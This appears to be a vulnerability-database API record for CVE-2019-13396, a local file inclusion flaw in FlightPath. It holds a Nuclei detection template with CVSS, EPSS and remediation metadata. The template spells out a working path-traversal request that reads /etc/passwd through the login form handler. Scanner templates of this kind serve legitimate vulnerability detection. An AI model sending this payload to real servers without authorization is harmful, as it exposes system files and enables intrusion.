{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2019-13396/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2019-13396/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2019-13396/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2019-13396/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2019-13396/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2019-13396"},"sightings":{"href":"/api/v1/sightings/cve-2019-13396"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2019/CVE-2019-13396.yaml","nuclei_template_severity":"medium","nuclei_template_yaml":"id: CVE-2019-13396\n\ninfo:\n  name: FlightPath - Local File Inclusion\n  author: 0x_Akoko,daffainfo\n  severity: medium\n  description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.\n  impact: |\n    This vulnerability can lead to unauthorized access, data leakage, and remote code execution.\n  remediation: |\n    Upgrade to the latest version to mitigate this vulnerability.\n  reference:\n    - https://www.exploit-db.com/exploits/47121\n    - http://getflightpath.com/node/2650\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-13396\n    - https://github.com/ARPSyndicate/kenzer-templates\n    - https://github.com/d4n-sec/d4n-sec.github.io\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2019-13396\n    cwe-id: CWE-22\n    epss-score: 0.62572\n    epss-percentile: 0.99153\n    cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: getflightpath\n    product: flightpath\n  tags: cve,cve2019,flightpath,lfi,edb,getflightpath,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /login HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/plain, */*\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n        callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: token\n        group: 1\n        regex:\n          - \"idden' name='form_token' value='([a-z0-9]+)'>\"\n        internal: true\n        part: body\n# digest: 4b0a00483046022100acfd5d0e5f85a01aad8b21cea003f261126d1d81b351354a8675b5e0674da717022100a13c03ab48c7f64400a0fad2d1b0af1a27444488813e3fa5c44d2e0b5949ee9f:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2019-13396"}